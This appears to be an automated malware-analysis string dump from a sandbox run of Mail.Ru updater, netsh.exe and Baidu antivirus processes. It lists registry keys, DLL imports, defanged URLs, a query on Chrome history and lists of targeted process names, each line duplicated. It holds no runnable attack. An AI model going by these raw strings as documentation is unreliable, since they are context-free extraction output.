HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
hXXp://binupdate.mail.ru/amigo/version2.xml
hXXp://binupdate.mail.ru/amigo/version2.xml
hXXp://binupdate.mail.ru/chrome/version3.xml
hXXp://binupdate.mail.ru/chrome/version3.xml
hXXp://binupdate.mail.ru/chrome/version2.xml
hXXp://binupdate.mail.ru/chrome/version2.xml
hXXp://binupdate.mail.ru/chrome/internet_to_amigo.xml
hXXp://binupdate.mail.ru/chrome/internet_to_amigo.xml
hXXp://binupdate.mail.ru/updater/version.xml
hXXp://binupdate.mail.ru/updater/version.xml
0.0.0.0
0.0.0.0
SELECT last_visit_time FROM urls order by last_visit_time DESC LIMIT 1
SELECT last_visit_time FROM urls order by last_visit_time DESC LIMIT 1
Google/Chrome/Application
Google/Chrome/Application
CGoogle/Chrome/User Data
CGoogle/Chrome/User Data
Software/Mail.Ru
Software/Mail.Ru
Amigo/Application/amigo.exe
Amigo/Application/amigo.exe
amsg
amsg
ISQLite error %1% returned by %2%
ISQLite error %1% returned by %2%
SQLite error code %1%, file %2%
SQLite error code %1%, file %2%
sqlite3_prepare16_v2
sqlite3_prepare16_v2
sqlite3_step
sqlite3_step
sqlite3
sqlite3
sAbsolutePath:
sAbsolutePath:
%1% (%2%)
%1% (%2%)
Software/Microsoft/Windows/CurrentVersion/Explorer/Shell Folders
Software/Microsoft/Windows/CurrentVersion/Explorer/Shell Folders
HTTP code %1%
HTTP code %1%
\StringFileInfo\xx
\StringFileInfo\xx
0123456789 ,.
0123456789 ,.
notepad.exe
notepad.exe
Internet Explorer/iexplore.exe
Internet Explorer/iexplore.exe
SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System
SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System
Invalid url
Invalid url
888816666554443
888816666554443
6666554443
6666554443
!6666554443
!6666554443
SKERNEL32.DLL
SKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
mscoree.dll
mscoree.dll
WUSER32.DLL
WUSER32.DLL
%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe
%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe
IDR_CHROME_MAILTABS
IDR_CHROME_MAILTABS
\Amigo\Application\amigo.exe
\Amigo\Application\amigo.exe
KERNEL32.DLL
KERNEL32.DLL
Mail.Ru updater
Mail.Ru updater
1.0.8.28
1.0.8.28
MailRuUpdater.exe
MailRuUpdater.exe
netsh.exe_2480:
.text
.text
`.data
`.data
.rsrc
.rsrc
msvcrt.dll
msvcrt.dll
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
MPRAPI.dll
MPRAPI.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
RASAPI32.dll
RASAPI32.dll
USER32.dll
USER32.dll
iphlpapi.dll
iphlpapi.dll
[%S] %S
[%S] %S
netsh.pdb
netsh.pdb
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
GetProcessHeap
GetProcessHeap
GetConsoleOutputCP
GetConsoleOutputCP
ntdll.dll
ntdll.dll
NETSH.EXE
NETSH.EXE
MatchCmdLine
MatchCmdLine
MatchTagsInCmdLine
MatchTagsInCmdLine
{X-X-X-XX-XXXXXX}
{X-X-X-XX-XXXXXX}
netsh.exe
netsh.exe
Error %d in FormatMessageW()
Error %d in FormatMessageW()
select * from Win32_OperatingSystem
select * from Win32_OperatingSystem
\\%s\root\cimv2
\\%s\root\cimv2
5.1.2600.5512 (xpsp.080413-0852)
5.1.2600.5512 (xpsp.080413-0852)
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
LFirst, add the protocol to the transport, and then add it to the interface.
LFirst, add the protocol to the transport, and then add it to the interface.
*The requested transport is not available.
*The requested transport is not available.
%1!s! ipmontr.dll
%1!s! ipmontr.dll
The above command installs ipmontr.dll in netsh.
The above command installs ipmontr.dll in netsh.
is removed, it is no longer supported by netsh.
is removed, it is no longer supported by netsh.
The command cannot be executed.
The command cannot be executed.
*Windows cannot open the file named %1!s!.
*Windows cannot open the file named %1!s!.
.The commit call to %1!s! cannot be completed.
.The commit call to %1!s! cannot be completed.
.Sets the current machine on which to operate.
.Sets the current machine on which to operate.
name - Name of the machine on which to operate
name - Name of the machine on which to operate
Sets the current machine on which to operate. If a machine name
Sets the current machine on which to operate. If a machine name
%1!s! open c:\logfiles\logfile.txt
%1!s! open c:\logfiles\logfile.txt
.Error creating key for %1!s! in the registry.
.Error creating key for %1!s! in the registry.
.Error deleting key for %1!s! in the registry.
.Error deleting key for %1!s! in the registry.
BaiduSdTray.exe_2996:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
PSSSSSSh
PSSSSSSh
D$XPSSh
D$XPSSh
..\src\google\protobuf\message_lite.cc
..\src\google\protobuf\message_lite.cc
CHECK failed: !coded_out.HadError():
CHECK failed: !coded_out.HadError():
..\src\google\protobuf\io\coded_stream.cc
..\src\google\protobuf\io\coded_stream.cc
%d.%d.%d
%d.%d.%d
libprotobuf %s %s:%d] %s
libprotobuf %s %s:%d] %s
..\src\google\protobuf\stubs\common.cc
..\src\google\protobuf\stubs\common.cc
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
inflate 1.2.5 Copyright 1995-2010 Mark Adler
inflate 1.2.5 Copyright 1995-2010 Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
1.2.5
{C6642F75-8DBE-473d-A98B-940F84EF702C}
{C6642F75-8DBE-473d-A98B-940F84EF702C}
.\Global\ReportBase\msg.pb.cc
.\Global\ReportBase\msg.pb.cc
datapkg.FieldsList
datapkg.FieldsList
datapkg.DataType
datapkg.DataType
CreateReportClient
CreateReportClient
ReleaseReportClient
ReleaseReportClient
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
kernel32.dll
kernel32.dll
X;
X;
%s>
%s>
%s="%s"
%s="%s"
%s='%s'
%s='%s'
version="%s"
version="%s"
encoding="%s"
encoding="%s"
standalone="%s"
standalone="%s"
1.0.1.1
1.0.1.1
%d.%d
%d.%d
d-d-d d:d:d
d-d-d d:d:d
RegKey
RegKey
RootKey
RootKey
SubKey
SubKey
IsNative64Key
IsNative64Key
CryptMsgGetParam
CryptMsgGetParam
CryptMsgClose
CryptMsgClose
CertFindCertificateInStore
CertFindCertificateInStore
CertFreeCertificateContext
CertFreeCertificateContext
CertCloseStore
CertCloseStore
CertGetNameStringW
CertGetNameStringW
CryptCATCatalogInfoFromContext
CryptCATCatalogInfoFromContext
Content-Length:%d
Content-Length:%d
s.x.baidu.com
s.x.baidu.com
c:\clientci\workspace\bdkv_v2.1_fix_compile\avmain_proj\Source\MiniUpdate\thirdparty\google/protobuf/repeated_field.h
c:\clientci\workspace\bdkv_v2.1_fix_compile\avmain_proj\Source\MiniUpdate\thirdparty\google/protobuf/repeated_field.h
c:\clientci\workspace\bdkv_v2.1_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
c:\clientci\workspace\bdkv_v2.1_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
.\update.pb.cc
.\update.pb.cc
%s:%u
%s:%u
%u.%u.%u.%u
%u.%u.%u.%u
addr %s not good...
addr %s not good...
Unsupported Media Type
Unsupported Media Type
HTTP Version not supported
HTTP Version not supported
HTTP/1.0
HTTP/1.0
HTTP/1.1
HTTP/1.1
1.0.0.1
1.0.0.1
.\header.pb.cc
.\header.pb.cc
https
https
ftpes
ftpes
ftps
ftps
tftp
tftp
% ;?:@=&,$/-_!.~*()
% ;?:@=&,$/-_!.~*()
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
%s\Connection
c:\clientci\workspace\bdkv_v2.1_fix_compile\basic\KVOutput\binrelease\BaiduSdTray.pdb
c:\clientci\workspace\bdkv_v2.1_fix_compile\basic\KVOutput\binrelease\BaiduSdTray.pdb
BDMSkin.dll
BDMSkin.dll
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
BDLogicUtils.dll
BDMFrameWork.dll
BDMFrameWork.dll
SHDeleteKeyW
SHDeleteKeyW
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
SetProcessShutdownParameters
SetProcessShutdownParameters
GetWindowsDirectoryW
GetWindowsDirectoryW
GetSystemWindowsDirectoryW
GetSystemWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
RegOpenKeyW
RegOpenKeyW
RegCreateKeyExW
RegCreateKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegFlushKey
RegFlushKey
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
RegSetKeySecurity
RegSetKeySecurity
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegGetKeySecurity
RegGetKeySecurity
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteExW
ShellExecuteExW
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
MSVCP80.dll
MSVCP80.dll
MSVCR80.dll
MSVCR80.dll
_amsg_exit
_amsg_exit
_wcmdln
_wcmdln
_crt_debugger_hook
_crt_debugger_hook
PSAPI.DLL
PSAPI.DLL
WTSAPI32.dll
WTSAPI32.dll
USERENV.dll
USERENV.dll
imagehlp.dll
imagehlp.dll
HttpSendRequestW
HttpSendRequestW
InternetCrackUrlW
InternetCrackUrlW
HttpOpenRequestW
HttpOpenRequestW
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
NETAPI32.dll
NETAPI32.dll
VERSION.dll
VERSION.dll
WS2_32.dll
WS2_32.dll
RegOpenKeyExA
RegOpenKeyExA
BaiduSdTray.exe
BaiduSdTray.exe
.?AVCBDMLauchReportRecord@@
.?AVCBDMLauchReportRecord@@
.?AVReportMessageBase@ns_reportbase@ns_global@@
.?AVReportMessageBase@ns_reportbase@ns_global@@
.?AVRegSystemCallPassThrough@ns_common@@
.?AVRegSystemCallPassThrough@ns_common@@
.?AVReportClient@ns_reportbase@ns_global@@
.?AVReportClient@ns_reportbase@ns_global@@
.?AVTSMsg@@
.?AVTSMsg@@
.?AVIBDMMsg@@
.?AVIBDMMsg@@
.?AVTSMsgMap@@
.?AVTSMsgMap@@
.?AVITSMsgMap@@
.?AVITSMsgMap@@
.?AVTSMsgDispatcher@@
.?AVTSMsgDispatcher@@
.?AVITSMsgDispatcher@@
.?AVITSMsgDispatcher@@
.?AVTSMsgStub@@
.?AVTSMsgStub@@
.?AVITSMsgStub@@
.?AVITSMsgStub@@
.?AVheader@http@bena@@
.?AVheader@http@bena@@
.?AVresponse@http@bena@@
.?AVresponse@http@bena@@
.?AVrequest@http@bena@@
.?AVrequest@http@bena@@
1%1X1u1{1
1%1X1u1{1
7-8}8&9S9x9
7-8}8&9S9x9
1/3E4
1/3E4
9 :-:3:|:
9 :-:3:|:
2!313\3|3
2!313\3|3
5%5X5l5|5
5%5X5l5|5
11U1]1q1
11U1]1q1
77q7
77q7
:,:6:>:`:
:,:6:>:`:
7&747=7]7
7&747=7]7
?0?4?8?
?0?4?8?
6$6,686\6|6
6$6,686\6|6
1$1,181\1|1
1$1,181\1|1
5 5$5(5,5054585\5
5 5$5(5,5054585\5
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
\iexplore.exe
\iexplore.exe
\Internet Explorer\iexplore.exe
\Internet Explorer\iexplore.exe
%s\baidubrowser.exe
%s\baidubrowser.exe
HKEY_LOCAL_MACHINE\Software
HKEY_LOCAL_MACHINE\Software
HKEY_CURRENT_USER\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\DirectShow
HKEY_CURRENT_USER\Software\Classes\DirectShow
HKEY_CURRENT_USER\Software\Classes\Interface
HKEY_CURRENT_USER\Software\Classes\Interface
HKEY_CURRENT_USER\Software\Classes\Media Type
HKEY_CURRENT_USER\Software\Classes\Media Type
HKEY_CURRENT_USER\Software\Classes\MediaFoundation
HKEY_CURRENT_USER\Software\Classes\MediaFoundation
HKEY_CLASSES_ROOT\CLSID
HKEY_CLASSES_ROOT\CLSID
HKEY_CLASSES_ROOT\DirectShow
HKEY_CLASSES_ROOT\DirectShow
HKEY_CLASSES_ROOT\Interface
HKEY_CLASSES_ROOT\Interface
HKEY_CLASSES_ROOT\Media Type
HKEY_CLASSES_ROOT\Media Type
HKEY_CLASSES_ROOT\MediaFoundation
HKEY_CLASSES_ROOT\MediaFoundation
HKEY_LOCAL_MACHINE\Software\Wow6432Node
HKEY_LOCAL_MACHINE\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\CLSID
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\CLSID
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\DirectShow
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\DirectShow
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Interface
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Interface
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Media Type
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Media Type
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\MediaFoundation
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\MediaFoundation
HKEY_CLASSES_ROOT\Wow6432Node\CLSID
HKEY_CLASSES_ROOT\Wow6432Node\CLSID
HKEY_CLASSES_ROOT\Wow6432Node\DirectShow
HKEY_CLASSES_ROOT\Wow6432Node\DirectShow
HKEY_CLASSES_ROOT\Wow6432Node\Interface
HKEY_CLASSES_ROOT\Wow6432Node\Interface
HKEY_CLASSES_ROOT\Wow6432Node\Media Type
HKEY_CLASSES_ROOT\Wow6432Node\Media Type
HKEY_CLASSES_ROOT\Wow6432Node\MediaFoundation
HKEY_CLASSES_ROOT\Wow6432Node\MediaFoundation
%d.%d.%d.%d
%d.%d.%d.%d
ntdll.dll
ntdll.dll
EXPLORER.EXE
EXPLORER.EXE
explorer.exe
explorer.exe
UDP-ADM_DRVE_ISTL_FID
UDP-ADM_DRVE_ISTL_FID
UDP-ADM_DRVE_OPEN_FID
UDP-ADM_DRVE_OPEN_FID
bdmantivirus\BDKitUtils.dll
bdmantivirus\BDKitUtils.dll
system32\DRIVERS\BDMWrench.sys
system32\DRIVERS\BDMWrench.sys
BDMNet.dll
BDMNet.dll
BaiduHips.exe
BaiduHips.exe
BaiduSdSvc.exe
BaiduSdSvc.exe
"%s\BaiduSdSvc.exe" -r
"%s\BaiduSdSvc.exe" -r
%Program Files% (x86)\Baidu
%Program Files% (x86)\Baidu
%Program Files%\Baidu
%Program Files%\Baidu
D:\Program Files (x86)\Baidu
D:\Program Files (x86)\Baidu
D:\Program Files\Baidu
D:\Program Files\Baidu
E:\Program Files (x86)\Baidu
E:\Program Files (x86)\Baidu
E:\Program Files\Baidu
E:\Program Files\Baidu
F:\Program Files (x86)\Baidu
F:\Program Files (x86)\Baidu
F:\Program Files\Baidu
F:\Program Files\Baidu
BaiduAnSvc.exe
BaiduAnSvc.exe
"%s\BaiduAnSvc.exe" -r
"%s\BaiduAnSvc.exe" -r
BDMReport.dll
BDMReport.dll
%s\baidu\baiduan\Config\8001.dat
%s\baidu\baiduan\Config\8001.dat
BaiduAnTray.exe
BaiduAnTray.exe
%s\BaiduHips.exe
%s\BaiduHips.exe
BaiduProtect.exe
BaiduProtect.exe
"%s\BaiduProtect.exe" -r
"%s\BaiduProtect.exe" -r
%Program Files% (x86)\Common Files\Baidu
%Program Files% (x86)\Common Files\Baidu
%Program Files%\Common Files\Baidu
%Program Files%\Common Files\Baidu
D:\Program Files (x86)\Common Files\Baidu
D:\Program Files (x86)\Common Files\Baidu
D:\Program Files\Common Files\Baidu
D:\Program Files\Common Files\Baidu
E:\Program Files (x86)\Common Files\Baidu
E:\Program Files (x86)\Common Files\Baidu
E:\Program Files\Common Files\Baidu
E:\Program Files\Common Files\Baidu
F:\Program Files (x86)\Common Files\Baidu
F:\Program Files (x86)\Common Files\Baidu
F:\Program Files\Common Files\Baidu
F:\Program Files\Common Files\Baidu
%s\baidu\baidusd\Config\900.dat
%s\baidu\baidusd\Config\900.dat
\\.\BDMWrench
\\.\BDMWrench
Global\BDDefenseDriver{80438582-0F66-44E0-3D2B-2D7E872CBFBB}
Global\BDDefenseDriver{80438582-0F66-44E0-3D2B-2D7E872CBFBB}
CD61BB3A-403D-7650-5D9A-4E57EA1035E6
CD61BB3A-403D-7650-5D9A-4E57EA1035E6
UDP-ADM_KITUTL_PH_SET_INVALID
UDP-ADM_KITUTL_PH_SET_INVALID
UDP-ADM_WMWCH_PH_SET_INVALID
UDP-ADM_WMWCH_PH_SET_INVALID
UDP-ADM_ST_ID:%d
UDP-ADM_ST_ID:%d
UDP-ADM_DRVE_RUN
UDP-ADM_DRVE_RUN
UDP-ADM_CLIENT_RUN
UDP-ADM_CLIENT_RUN
UDP-ADM_CPY_SYS_FID
UDP-ADM_CPY_SYS_FID
UDP-ADM_OPEN_SYS_FID
UDP-ADM_OPEN_SYS_FID
UDP-ADM_INST_SYS_FID
UDP-ADM_INST_SYS_FID
UDP-ADM_SED_PAVER_FID
UDP-ADM_SED_PAVER_FID
UDP-ADM_ATR_SET
UDP-ADM_ATR_SET
UDP-ADM_SED_ATR_FID
UDP-ADM_SED_ATR_FID
UDP-ADM_SED_FSD
UDP-ADM_SED_FSD
UDP-ADM_RPT_FID
UDP-ADM_RPT_FID
UDP-ADM_FSD
UDP-ADM_FSD
\BaiduSdSvc.exe
\BaiduSdSvc.exe
\BaiduAnSvc.exe
\BaiduAnSvc.exe
UDP-ADM_RPT_INIT_FID
UDP-ADM_RPT_INIT_FID
\system32\drivers\BDMWrench.sys
\system32\drivers\BDMWrench.sys
drivers\BDMWrench.sys
drivers\BDMWrench.sys
UDP-EVT_WFR
UDP-EVT_WFR
UDP-EVT_WFID
UDP-EVT_WFID
UDP-ADM_SED_PAVER2_FID
UDP-ADM_SED_PAVER2_FID
\BaiduSdTray.exe" -stmd=3
\BaiduSdTray.exe" -stmd=3
\BaiduAnTray.exe" -stmd=3
\BaiduAnTray.exe" -stmd=3
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
xx
xx
C9521EC1-6642-5CF6-8FB9-DE04639593BD
C9521EC1-6642-5CF6-8FB9-DE04639593BD
UDP-PS_KITUTI_PH_SET_INVALID
UDP-PS_KITUTI_PH_SET_INVALID
UDP-PS_LD_FID
UDP-PS_LD_FID
UDP-PL_SRV_ID:%d
UDP-PL_SRV_ID:%d
UDP-PL_SRV_RUN
UDP-PL_SRV_RUN
UDP-PL_SRV_INSTPH_FID
UDP-PL_SRV_INSTPH_FID
UDP-PL_SRV_CK_REG_DAMG
UDP-PL_SRV_CK_REG_DAMG
UDP-PL_SRV_REPT01_FID
UDP-PL_SRV_REPT01_FID
UDP-PL_SRV_REGREPIR_FID
UDP-PL_SRV_REGREPIR_FID
UDP-PL_SRV_PL_FID
UDP-PL_SRV_PL_FID
UDP-PL_SRV_REPT02_FID
UDP-PL_SRV_REPT02_FID
UDP-PL_SRV_FSD
UDP-PL_SRV_FSD
UDP-PL_TRY_ID:%d
UDP-PL_TRY_ID:%d
UDP-PL_TRY_RUN
UDP-PL_TRY_RUN
UDP-PL_TRY_INSTPH_FID
UDP-PL_TRY_INSTPH_FID
UDP-PL_TRY_UN_ATRUN
UDP-PL_TRY_UN_ATRUN
UDP-PL_TRY_REPT01_FID
UDP-PL_TRY_REPT01_FID
UDP-PL_TRY_PL_FID
UDP-PL_TRY_PL_FID
UDP-PL_TRY_REPT02_FID
UDP-PL_TRY_REPT02_FID
UDP-PL_TRY_FSD
UDP-PL_TRY_FSD
UDP-PL_RPT_INIT_FID
UDP-PL_RPT_INIT_FID
UDP-ADM_SET_KITU
UDP-ADM_SET_KITU
UDP-ADM_SET_MWR_PATH
UDP-ADM_SET_MWR_PATH
UDP-ADM_OS_ERR
UDP-ADM_OS_ERR
UDP-ADM_PROC_DIR_UN_EXIST
UDP-ADM_PROC_DIR_UN_EXIST
UDP-ADM_PROC_GT_VER_FID
UDP-ADM_PROC_GT_VER_FID
UDP-ADM_PROC_MATCH_FID
UDP-ADM_PROC_MATCH_FID
\BDConfig.dll
\BDConfig.dll
hh_debug:%s
hh_debug:%s
BaiduSdUpdate.exe
BaiduSdUpdate.exe
Wtsapi32.dll
Wtsapi32.dll
\BaiduAn.exe
\BaiduAn.exe
\BDKVRecomm.dll
\BDKVRecomm.dll
BDMgr.exe -stmd=6
BDMgr.exe -stmd=6
BDMgr.exe -stmd=7
BDMgr.exe -stmd=7
TrayPluginContainerConfig.xml
TrayPluginContainerConfig.xml
BDMgr.exe -stmd=7 -selplugin={914438D6-1EC4-434A-B6EC-20F84894C395}
BDMgr.exe -stmd=7 -selplugin={914438D6-1EC4-434A-B6EC-20F84894C395}
hXXp://anquan.baidu.com/bbs/forum.php?mod=post&action=newthread&fid=40
hXXp://anquan.baidu.com/bbs/forum.php?mod=post&action=newthread&fid=40
{E059A29F-D2ED-4f28-849A-851AA9D5A05C}
{E059A29F-D2ED-4f28-849A-851AA9D5A05C}
C:\test.txt
C:\test.txt
BarServer.exe|BarMonitor.exe|BarServerView.exe|BMServerManager.exe|BarClient.exe|BarClientView.exe|PersonUDisk.exe|BarClientSafeCenter.exe|EGUpgrader.exe|eyvncnbsvr.exe|EGVirtualDisk.exe|EGVncService.exe|EyooNetS.exe|Enjoytray.exe|EntDesktop.exe|eyuscore|eyoorun.exe|grb.exe|irsetup.exe|Gptsvr.exe|HINTAMPROXY.exe|HintClient.exe|HintBackup.exe|wxServer.exe|wxSysTray.exe|wxServerView.exe|clsmn.exe|DFServ.exe|FrzState2k.exe|PubwinCore.exe|PubwinPool.exe|Pubwin2007.exe|Pubwin2009.exe|xsMenu.exe|
BarServer.exe|BarMonitor.exe|BarServerView.exe|BMServerManager.exe|BarClient.exe|BarClientView.exe|PersonUDisk.exe|BarClientSafeCenter.exe|EGUpgrader.exe|eyvncnbsvr.exe|EGVirtualDisk.exe|EGVncService.exe|EyooNetS.exe|Enjoytray.exe|EntDesktop.exe|eyuscore|eyoorun.exe|grb.exe|irsetup.exe|Gptsvr.exe|HINTAMPROXY.exe|HintClient.exe|HintBackup.exe|wxServer.exe|wxSysTray.exe|wxServerView.exe|clsmn.exe|DFServ.exe|FrzState2k.exe|PubwinCore.exe|PubwinPool.exe|Pubwin2007.exe|Pubwin2009.exe|xsMenu.exe|
OUTLOOK.EXE|RTX.exe|Foxmail.exe|OfficeTask.exe|OfficeIm.exe|OfficeMail.exe|OfficeDaemon.exe|OfficeIndex.exe|OfficePOP3.exe|
OUTLOOK.EXE|RTX.exe|Foxmail.exe|OfficeTask.exe|OfficeIm.exe|OfficeMail.exe|OfficeDaemon.exe|OfficeIndex.exe|OfficePOP3.exe|
iNode Client.exe|8021x.exe|DrClient.exe|DrUpdate.exe|DrMain.exe|
iNode Client.exe|8021x.exe|DrClient.exe|DrUpdate.exe|DrMain.exe|
ic_danger.png
ic_danger.png
BaiduSdBugRpt.exe
BaiduSdBugRpt.exe
BaiduSd.exe
BaiduSd.exe
Client.exe
Client.exe
\GameNoDisturb.ini
\GameNoDisturb.ini
\PullUpConfig.xml
\PullUpConfig.xml
file='skin_1.png' xtiled='true' ytiled='true'
file='skin_1.png' xtiled='true' ytiled='true'
\BaiduSdSvc.exe -m "
\BaiduSdSvc.exe -m "
\cmd.exe
\cmd.exe
Shell32.dll
Shell32.dll
\BaiduSd.exe
\BaiduSd.exe
-selplugin=rdp_scan -vll=%s
-selplugin=rdp_scan -vll=%s
BaiduSd{D8A4131D-3A7A-48a1-B080-28E1DC04F7C2}
BaiduSd{D8A4131D-3A7A-48a1-B080-28E1DC04F7C2}
100012_1
100012_1
CheckIco_Select_hor.png
CheckIco_Select_hor.png
CheckIco.png
CheckIco.png
ic_menu_logo_hor.png
ic_menu_logo_hor.png
CheckIco_hor.png
CheckIco_hor.png
CheckIco_Select.png
CheckIco_Select.png
MainIco_hor.png
MainIco_hor.png
ic_menu_logo.png
ic_menu_logo.png
MainIco.png
MainIco.png
menu.xml
menu.xml
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduSd
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduSd
2.1.0.3086
2.1.0.3086
hXXp://anquan.baidu.com/shadu
hXXp://anquan.baidu.com/shadu
hXXp://shadu.baidu.com/privacy.html
hXXp://shadu.baidu.com/privacy.html
about.xml
about.xml
@advapi32.dll
@advapi32.dll
JoinBaiduCloundPlan
JoinBaiduCloundPlan
SWITCH_CENTER_URLSAFE
SWITCH_CENTER_URLSAFE
000%x
000%x
\StringFileInfo\%s\FileVersion
\StringFileInfo\%s\FileVersion
ABDKVMainframe.dll
ABDKVMainframe.dll
BDCooly.dll
BDCooly.dll
A\\.\pipe\{5EA6312A-0014-4160-AF85-E26361D6281E}
A\\.\pipe\{5EA6312A-0014-4160-AF85-E26361D6281E}
\StringFileInfo\xx\FileVersion
\StringFileInfo\xx\FileVersion
\kernel32.dll
\kernel32.dll
Windows 8.1
Windows 8.1
Windows 8.0
Windows 8.0
Windows 7
Windows 7
Windows Vista
Windows Vista
Windows 7
Windows 7
Windows Vista
Windows Vista
Windows Server 2003,
Windows Server 2003,
Windows XP
Windows XP
Windows 2000
Windows 2000
Windows NT
Windows NT
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
Windows 95
Windows 95
Windows 98
Windows 98
Windows ME
Windows ME
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
okernel32.dll
okernel32.dll
HKEY_USERS
HKEY_USERS
Software\Microsoft\Windows NT\CurrentVersion\Time Zones\
Software\Microsoft\Windows NT\CurrentVersion\Time Zones\
Software\Microsoft\Windows NT\CurrentVersion\ProfileList\
Software\Microsoft\Windows NT\CurrentVersion\ProfileList\
Software\Microsoft\Windows NT\CurrentVersion\Print\
Software\Microsoft\Windows NT\CurrentVersion\Print\
Software\Microsoft\Windows NT\CurrentVersion\Ports\
Software\Microsoft\Windows NT\CurrentVersion\Ports\
Software\Microsoft\Windows NT\CurrentVersion\Perflib\
Software\Microsoft\Windows NT\CurrentVersion\Perflib\
Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Software\Microsoft\Windows NT\CurrentVersion\Language Pack\
Software\Microsoft\Windows NT\CurrentVersion\Language Pack\
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\
Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\
Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\
Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\
Software\Microsoft\Windows NT\CurrentVersion\Fonts\
Software\Microsoft\Windows NT\CurrentVersion\Fonts\
Software\Microsoft\Windows NT\CurrentVersion\FontMapper\
Software\Microsoft\Windows NT\CurrentVersion\FontMapper\
Software\Microsoft\Windows NT\CurrentVersion\FontLink\
Software\Microsoft\Windows NT\CurrentVersion\FontLink\
Software\Microsoft\Windows NT\CurrentVersion\FontDpi\
Software\Microsoft\Windows NT\CurrentVersion\FontDpi\
Software\Microsoft\Windows NT\CurrentVersion\Console\
Software\Microsoft\Windows NT\CurrentVersion\Console\
Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\
Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\
Software\Microsoft\Windows\CurrentVersion\Setup\
Software\Microsoft\Windows\CurrentVersion\Setup\
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\
Software\Microsoft\Windows\CurrentVersion\Policies\
Software\Microsoft\Windows\CurrentVersion\Policies\
Software\Microsoft\Windows\CurrentVersion\Group Policy\
Software\Microsoft\Windows\CurrentVersion\Group Policy\
Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\
Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\
